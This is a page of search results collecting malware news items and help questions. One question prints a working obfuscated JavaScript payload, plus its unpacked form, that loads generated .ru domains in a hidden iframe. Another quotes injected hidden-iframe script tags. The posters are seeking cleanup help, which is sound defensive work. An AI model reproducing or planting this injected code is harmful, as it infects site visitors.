Search Results

Search found 639 results on 26 pages for 'malware'.

Page 5/26 | < Previous Page | 1 2 3 4 5 6 7 8 9 10 11 12  | Next Page >

  • Digitally Signed Malware on the Rise

    Brought to the forefront in 2010 with Stuxnet, the infamous worm aimed at sabotaging industrial infrastructure, the use of stolen digital certificates is relatively new. Stuxnet's creators digitally signed its rootkit components with stolen certificates from JMicron and RealTek, a pair of semiconductor manufacturers. The worm's existence and complexity caught the security community by surprise. In fact, many researchers predicted that malware creators would begin adopting the same technique to work around driver signature enforcement employed by Microsoft in its 64-bit versions of Windows V...

    Read the article

  • Week in Geek: Botnet Epidemic Fueled by Malware Toolkits Edition

    - by Asian Angel
    This week we learned how to stream media files from any PC to a PlayStation, enable user-specific wireless networks in Windows 7, monitor the bandwidth consumption of individual applications, configure the Linux Grub2 Boot Menu the easy way, “add Dropbox to the Start Menu, understand symbolic links, & rip TV Series DVDs into episode files”, and more Latest Features How-To Geek ETC How to Enable User-Specific Wireless Networks in Windows 7 How to Use Google Chrome as Your Default PDF Reader (the Easy Way) How To Remove People and Objects From Photographs In Photoshop Ask How-To Geek: How Can I Monitor My Bandwidth Usage? Internet Explorer 9 RC Now Available: Here’s the Most Interesting New Stuff Here’s a Super Simple Trick to Defeating Fake Anti-Virus Malware Comix is an Awesome Comics Archive Viewer for Linux Get the MakeUseOf eBook Guide to Speeding Up Windows for Free Need Tech Support? Call the Star Wars Help Desk! [Video Classic] Reclaim Vertical UI Space by Adding a Toolbar to the Left or Right Side of Firefox Androidify Turns You into an Android-style Avatar Reader for Android Updates; Now with Feed Widgets and More

    Read the article

  • Crisis : le premier malware à cibler les machines virtuelles sous Windows

    Crisis : le premier malware à cibler les machines virtuelles Sous Windows Préalablement connu sous le nom Morcut, "Crisis" est un rootkit malicieux qui infecte les systèmes d'exploitation Windows et Mac OS X. Il y arrive par l'utilisation d'un faux installeur d'Adobe Flash Player dissimulé dans une archive JAR numériquement signé par VeriSign. Cette dernière contient deux exécutables, un pour Mac OS X et un autre pour Windows. Selon le dernier rapport de Symantec Security, le logiciel malveillant se propage dans l'environnement Windows par l'utilisation du mécanisme d'autorun des disques durs amovibles, et les composants d'installation dans les dispositifs Windows Mobile. Entr...

    Read the article

  • File association and msconfig broken. Malware?

    - by Moshe
    A friend of mine had an Acer laptop. It has Vista Home Basic. I can't get system properties open. Msconfig does not run. Also, exe filetype is asking me what program to run it with. How can I fix that? I'm running AVG now. Assuming nothing shows up, what are fixes to the above mentioned issues?

    Read the article

  • Is there any way to set up a malware-blocking transparent proxy on an Airport Extreme?

    - by Chris R
    I'd like to add some kind of easily-administered transparent HTTP proxy to my home network. Ideally, it would allow me to, for example, redirect web requests to blacklisted servers into nothing, block certain kinds of content, et al. My home network at the moment consists of a mac mini media server that could -- if the load wasn't huge -- fill this role as well, an Airport Extreme, and a mac laptop that is my main machine. I'm reasonably technically savvy, so don't spare the complicated answers.

    Read the article

  • What are ways to prevent files with the Right-to-Left Override Unicode character in their name (a malware spoofing method) from being written or read?

    - by galacticninja
    What are ways to avoid or prevent files with the RLO (Right-to-Left Override) Unicode character in their name (a malware method to spoof filenames) from being written or read in a Windows PC? More info on the RLO unicode character here: http://www.fileformat.info/info/unicode/char/202e/index.htm http://en.wikipedia.org/wiki/Bi-directional_text Info on the RLO unicode character when used by malware: http://www.ipa.jp/security/english/virus/press/201110/E_PR201110.html Mirror link: http://webcache.googleusercontent.com/search?q=cache:KasmfOvbVJ8J:www.ipa.jp/security/english/virus/press/201110/E_PR201110.html+&cd=1&hl=en&ct=clnk You can try this RLO character test webpage: http://www.fileformat.info/info/unicode/char/202e/browsertest.htm The RLO character is also already pasted in the 'Input Test' field in that webpage. Try typing there and notice that the characters you're typing are coming out in their reverse orders (right-to-left, instead of left-to-right). In filenames, the RLO character can be specifically positioned in the filename to spoof or masquerade as having a filename or file extension that is different than what it actually has. (Will still be hidden even if 'Hide extensions for known filetypes' is unchecked.) The only info I can find that has info on how to prevent files with the RLO character from being run is from the Information Technology Promotion Agency, Japan website: http://www.ipa.jp/security/english/virus/press/201110/E_PR201110.html (Mirror link). They adviced to use the Local Security Policy settings manager to block files with the RLO character in its name from being run. Can anyone recommend any other good solutions to prevent files with the RLO character in their names from being written or being read in the computer, or a way to alert the user if a file with the RLO character is detected? My OS is Windows 7, but I'll be looking for solutions for Windows XP, Vista and 7, or a solution that will work for all those OSes, to help people using those OSes too.

    Read the article

  • Got a malware on my hosting provider which infect JavaScript files .. how do I find the entry point?

    - by h3.
    This morning some sites which are hosted on the server as me started triggering malware alerts and started to redirect traffic to external sites. I've found out that a line of packed javascript was added to many js files across the server. What the script does is pretty simple, but what I would like to know is if this malware is well known and how it infect servers and propagate. For the curious here's the javascript line in question: /*km0ae9gr6m*/try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;try{bcsd=prototype-2;}catch(bawg){ss=[];f=(h)?("fromCharC"+"ode"):"";e=window["e"+"val"];n=[102,234,330,396,116,210,333,440,32,220,303,480,116,164,291,440,100,222,327,312,117,218,294,404,114,80,123,492,10,64,96,128,32,236,291,456,32,208,315,128,61,64,348,416,105,230,138,460,101,202,300,128,47,64,348,416,105,230,138,324,59,20,96,128,32,64,354,388,114,64,324,444,32,122,96,464,104,210,345,184,115,202,303,400,32,74,96,464,104,210,345,184,81,118,30,128,32,64,96,472,97,228,96,464,101,230,348,128,61,64,348,416,105,230,138,260,32,84,96,432,111,64,135,128,116,208,315,460,46,164,96,168,32,208,315,236,10,64,96,128,32,210,306,160,116,202,345,464,32,124,96,192,41,246,30,128,32,64,96,128,32,64,96,464,104,210,345,184,115,202,303,400,32,122,96,464,101,230,348,236,10,64,96,128,32,250,96,404,108,230,303,128,123,20,96,128,32,64,96,128,32,64,348,416,105,230,138,460,101,202,300,128,61,64,348,404,115,232,96,172,32,232,312,420,115,92,231,236,10,64,96,128,32,250,30,128,32,64,96,456,101,232,351,456,110,64,120,464,104,210,345,184,115,202,303,400,32,84,96,464,104,210,345,184,111,220,303,316,118,202,342,308,41,118,30,500,10,20,306,468,110,198,348,420,111,220,96,328,97,220,300,444,109,156,351,436,98,202,342,284,101,220,303,456,97,232,333,456,40,234,330,420,120,82,369,40,32,64,96,128,118,194,342,128,100,64,183,128,110,202,357,128,68,194,348,404,40,234,330,420,120,84,147,192,48,96,123,236,10,64,96,128,32,236,291,456,32,230,96,244,32,200,138,412,101,232,216,444,117,228,345,160,41,64,186,128,49,100,96,252,32,98,96,232,32,96,177,40,32,64,96,128,116,208,315,460,46,230,303,404,100,64,183,128,50,102,156,212,54,110,168,228,48,98,96,172,32,80,300,184,103,202,348,308,111,220,348,416,40,82,96,168,32,96,360,280,70,140,210,280,70,82,96,172,32,80,300,184,103,202,348,272,97,232,303,160,41,64,126,128,48,240,210,280,70,140,123,172,32,80,231,388,116,208,138,456,111,234,330,400,40,230,96,168,32,96,360,280,70,140,123,164,59,20,96,128,32,64,348,416,105,230,138,260,32,122,96,208,56,100,165,196,59,20,96,128,32,64,348,416,105,230,138,308,32,122,96,200,49,104,165,208,56,102,162,208,55,118,30,128,32,64,96,464,104,210,345,184,81,64,183,128,116,208,315,460,46,154,96,188,32,232,312,420,115,92,195,236,10,64,96,128,32,232,312,420,115,92,246,128,61,64,348,416,105,230,138,308,32,74,96,464,104,210,345,184,65,118,30,128,32,64,96,464,104,210,345,184,111,220,303,316,118,202,342,308,32,122,96,196,46,96,96,188,32,232,312,420,115,92,231,236,10,64,96,128,32,232,312,420,115,92,330,404,120,232,96,244,32,220,303,480,116,164,291,440,100,222,327,312,117,218,294,404,114,118,30,128,32,64,96,456,101,232,351,456,110,64,348,416,105,230,177,40,125,20,30,408,117,220,297,464,105,222,330,128,99,228,303,388,116,202,246,388,110,200,333,436,78,234,327,392,101,228,120,456,44,64,231,420,110,88,96,308,97,240,123,492,10,64,96,128,32,228,303,464,117,228,330,128,77,194,348,416,46,228,333,468,110,200,120,160,77,194,360,180,77,210,330,164,32,84,96,456,46,220,303,480,116,80,123,128,43,64,231,420,110,82,177,40,125,20,30,408,117,220,297,464,105,222,330,128,103,202,330,404,114,194,348,404,80,230,303,468,100,222,246,388,110,200,333,436,83,232,342,420,110,206,120,468,110,210,360,176,32,216,303,440,103,232,312,176,32,244,333,440,101,82,369,40,32,64,96,128,118,194,342,128,114,194,330,400,32,122,96,440,101,238,96,328,97,220,300,444,109,156,351,436,98,202,342,284,101,220,303,456,97,232,333,456,40,234,330,420,120,82,177,40,32,64,96,128,118,194,342,128,108,202,348,464,101,228,345,128,61,64,273,156,97,78,132,156,98,78,132,156,99,78,132,156,100,78,132,156,101,78,132,156,102,78,132,156,103,78,132,156,104,78,132,156,105,78,132,156,106,78,132,156,107,78,132,156,108,78,132,156,109,78,132,156,110,78,132,156,111,78,132,156,112,78,132,156,113,78,132,156,114,78,132,156,115,78,132,156,116,78,132,156,117,78,132,156,118,78,132,156,119,78,132,156,120,78,132,156,121,78,132,156,122,78,279,236,10,64,96,128,32,236,291,456,32,230,348,456,32,122,96,156,39,118,30,128,32,64,96,408,111,228,120,472,97,228,96,420,32,122,96,192,59,64,315,128,60,64,324,404,110,206,348,416,59,64,315,128,43,86,96,164,123,20,96,128,32,64,96,128,32,64,345,464,114,64,129,244,32,216,303,464,116,202,342,460,91,198,342,404,97,232,303,328,97,220,300,444,109,156,351,436,98,202,342,160,114,194,330,400,44,64,144,176,32,216,303,464,116,202,342,460,46,216,303,440,103,232,312,128,45,64,147,164,93,118,30,128,32,64,96,500,10,64,96,128,32,228,303,464,117,228,330,128,115,232,342,128,43,64,117,184,39,64,129,128,122,222,330,404,59,20,375,40,10,230,303,464,84,210,327,404,111,234,348,160,102,234,330,396,116,210,333,440,40,82,369,40,32,64,96,128,116,228,363,492,10,64,96,128,32,64,96,128,32,210,306,160,116,242,336,404,111,204,96,420,102,228,291,436,101,174,291,460,67,228,303,388,116,202,300,128,61,122,96,136,117,220,300,404,102,210,330,404,100,68,123,492,10,64,96,128,32,64,96,128,32,64,96,128,32,210,306,456,97,218,303,348,97,230,201,456,101,194,348,404,100,64,183,128,116,228,351,404,59,20,96,128,32,64,96,128,32,64,96,128,32,64,354,388,114,64,351,440,105,240,96,244,32,154,291,464,104,92,342,444,117,220,300,160,43,220,303,476,32,136,291,464,101,80,123,188,49,96,144,192,41,118,30,128,32,64,96,128,32,64,96,128,32,64,96,472,97,228,96,400,111,218,291,420,110,156,291,436,101,64,183,128,103,202,330,404,114,194,348,404,80,230,303,468,100,222,246,388,110,200,333,436,83,232,342,420,110,206,120,468,110,210,360,176,32,98,162,176,32,78,342,468,39,82,177,40,32,64,96,128,32,64,96,128,32,64,96,128,105,204,342,436,32,122,96,400,111,198,351,436,101,220,348,184,99,228,303,388,116,202,207,432,101,218,303,440,116,80,102,292,70,164,195,308,69,68,123,236,32,20,96,128,32,64,96,128,32,64,96,128,32,64,315,408,114,218,138,460,101,232,195,464,116,228,315,392,117,232,303,160,34,230,342,396,34,88,96,136,104,232,348,448,58,94,141,136,43,200,333,436,97,210,330,312,97,218,303,172,34,94,342,468,110,204,333,456,101,230,348,456,117,220,189,460,105,200,183,396,120,68,123,236,32,20,96,128,32,64,96,128,32,64,96,128,32,64,315,408,114,218,138,460,116,242,324,404,46,238,315,400,116,208,96,244,32,68,144,448,120,68,177,128,10,64,96,128,32,64,96,128,32,64,96,128,32,210,306,456,109,92,345,464,121,216,303,184,104,202,315,412,104,232,96,244,32,68,144,448,120,68,177,128,10,64,96,128,32,64,96,128,32,64,96,128,32,210,306,456,109,92,345,464,121,216,303,184,118,210,345,420,98,210,324,420,116,242,96,244,32,68,312,420,100,200,303,440,34,118,96,40,32,64,96,128,32,64,96,128,32,64,96,128,100,222,297,468,109,202,330,464,46,196,333,400,121,92,291,448,112,202,330,400,67,208,315,432,100,80,315,408,114,218,123,236,10,64,96,128,32,64,96,128,32,250,30,128,32,64,96,500,99,194,348,396,104,80,303,164,123,250,30,500,44,64,159,192,48,82,177];if(window.document)for(i=6-2-1-2-1;-1771+i!=2-2;i++){k=i;ss=ss+String[f](n[k]/(i%(h*h)+2-1));}e(ss);}}/*qhk6sa6g1c*/ Once unpacked it looks like this: function nextRandomNumber(){ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.seed * this.oneOverM); } function RandomNumberGenerator(unix){ var d = new Date(unix*1000); var s = d.getHours() > 12 ? 1 : 0; this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF)+ (Math.round(s * 0xFFF)); this.A = 48271; this.M = 2147483647; this.Q = this.M / this.A; this.R = this.M % this.A; this.oneOverM = 1.0 / this.M; this.next = nextRandomNumber; return this; } function createRandomNumber(r, Min, Max){ return Math.round((Max-Min) * r.next() + Min); } function generatePseudoRandomString(unix, length, zone){ var rand = new RandomNumberGenerator(unix); var letters = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']; var str = ''; for(var i = 0; i < length; i ++ ){ str += letters[createRandomNumber(rand, 0, letters.length - 1)]; } return str + '.' + zone; } setTimeout(function(){ try{ if(typeof iframeWasCreated == "undefined"){ iframeWasCreated = true; var unix = Math.round(+new Date()/1000); var domainName = generatePseudoRandomString(unix, 16, 'ru'); ifrm = document.createElement("IFRAME"); ifrm.setAttribute("src", "http://"+domainName+"/runforestrun?sid=cx"); ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } }catch(e){} }, 500);

    Read the article

  • Ouch, how to escape this in sed? Cleaning up iframe malware

    - by user1769783
    I'm helping someone clean up a malware infection on a site and I'm having a difficult time correctly matching some strings in sed so I can create a script to mass search and replace / remove it. The strings are: <script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.iws-leipzig.de/contacts.php"></iframe></div>');</script> <script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://vidintex.com/includes/class.pop.php"></iframe></div>');</script> <script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.iws-leipzig.de/contacts.php"></iframe></div>');</script> I cant seem to figure out how to escape the various characters in those lines... If I try to just say delete the entire line if it matches http://vidintex.com/includes/class.pop.php it also deletes the closing "" in the .html files as well. Any help would be greatly appreciated!

    Read the article

  • Week in Geek: New Malware Steals Bitcoin Currency

    - by Asian Angel
    This week we learned how to easily change a dual-booting PC’s default OS, “extract audio from any video using VLC, sneak around paywalls, & delay Windows Live Mesh during boot”, shrink videos to fit an Android phone with VLC, fix damaged or broken audio cables, “decide between an ISO or TS folder, help Windows 7 remember folder locations, & convert books for the Kindle”, and more. Photo by Profound Whatever.How to Make and Install an Electric Outlet in a Cabinet or DeskHow To Recover After Your Email Password Is CompromisedHow to Clean Your Filthy Keyboard in the Dishwasher (Without Ruining it)

    Read the article

  • Week in Geek: Malware-Infected Web Sites Doubled Since Last Year

    - by Asian Angel
    This week we learned how to get spelling autocorrect across all applications on a Windows system, “diagnose DSL hang ups, extract media files from PowerPoint presentations, & restrict IE to a single website”, customize the Ubuntu bootloader screen, get smartphone-style word suggestion on Windows systems, learned what character encodings are and how they differ, and more. Photo by Profound Whatever.HTG Explains: What Are Character Encodings and How Do They Differ?How To Make Disposable Sleeves for Your In-Ear MonitorsMacs Don’t Make You Creative! So Why Do Artists Really Love Apple?

    Read the article

  • Week in Geek: Malware for Android has Increased 472% since July

    - by Asian Angel
    This week we learned how to safely eject your USB devices from the desktop context menu, make the Kindle Fire Silk Browser *actually* fast, “disable Windows startup programs, use DNS names on your home network, & restore a vintage keyboard”, print or save a directory listing to a file, make your computer press a key every X seconds, and more. How to Make the Kindle Fire Silk Browser *Actually* Fast! Amazon’s New Kindle Fire Tablet: the How-To Geek Review HTG Explains: How Hackers Take Over Web Sites with SQL Injection / DDoS

    Read the article

  • Mobilizing A Community To Fight Malware

    <b>Help Net Security:</b> "The word about Immunet's free anti-virus solution is spreading fast. The agent installed on my computer tells me that there are currently 162,597 people in the Immunet Cloud, and that I'm protected from 12,637,576 threats"

    Read the article

  • I am starting to think that Prevx.com isnt a legit site...but heres my long-winded question

    - by cop1152
    I apologize in advance for the long-winded post. I posted it all because I believe its informative and may be useful. Also, I posted my question at the end. Moments ago I was RDC to a file server in my home (from inside my home). I had opened Firefox and Googled for a manufacturers website. Immediately after clicking the link, Firefox abruptly closed. This seemed odd to me to so I checked the running processes and discovered d.exe, e.exe, and f.exe running. I Googled these processes on a different machine and found them belonging to a key-logger/screen-capturer/trojan called defender.exe, which according to the Prevx lives in c:\documents and settings\user\local settings\temp. (Prevx link http://www.prevx.com/filenames/147352809685142526-X1/DEFENDER32.EXE.html) Simultaneously, an obviously-spoofed Windows Firewall popup appeared on the server asking me to click ‘yes’ to update Windows Firewall. At this time I ended all rogue processes, emptied the temp folder, removed defender.exe from startup, and checked my registry and a few other locations. Before deleting Defender.exe I noted that it was created moments ago, just before Firefox crashed. I believe that I was ‘almost’ infected with this malware. I believe that it needed me to click the phony popup in order to complete infection because it wasn’t allowed to execute processes from the temp folder. After cleaning the machine, I restarted it and have been monitoring it for over an hour. I am debating on whether or not to restore the Windows partition (a separate physical drive from the data) or to just watch it for awhle. I should mention that, because of the specs on this machine, I do not run antivirus software, but I know it well and inspect it regularly. It is a very old Compaq with a 400mhz processer and 512mb of ram. I have a static IP and the server is in the DMZ running an FTP client and some HTTP server software. All files transferred to and stored on this machine are scanned for malware before transferring. Usually the machine only runs 19 processes and performs pretty well for its intended purpose. I posted the story so that you could be aware of a possible new piece of malware and how it acts, but I also have a question or two. First, over the last few months I have noticed that PREVX is listed at the top of most of my Google searches when researching malware, especially for new or obscure malware…and they always want you to purchase something. I don’t think they are one of the top AV companies, so it seems odd that they are always the top Google result. Does anyone have any experience with any of their products? Also, what sites do you rely on for malware researching? Recently, I have found it difficult to find good info because of HijackThis-logs and other deadend info cluttering up my searches. And lastly, besides antivirus, third-party firewall, etc, what settings would you use to lock down a machine to make it more secure in instances where a stubborn admin like myself refuses to run AV? Thanks.

    Read the article

< Previous Page | 1 2 3 4 5 6 7 8 9 10 11 12  | Next Page >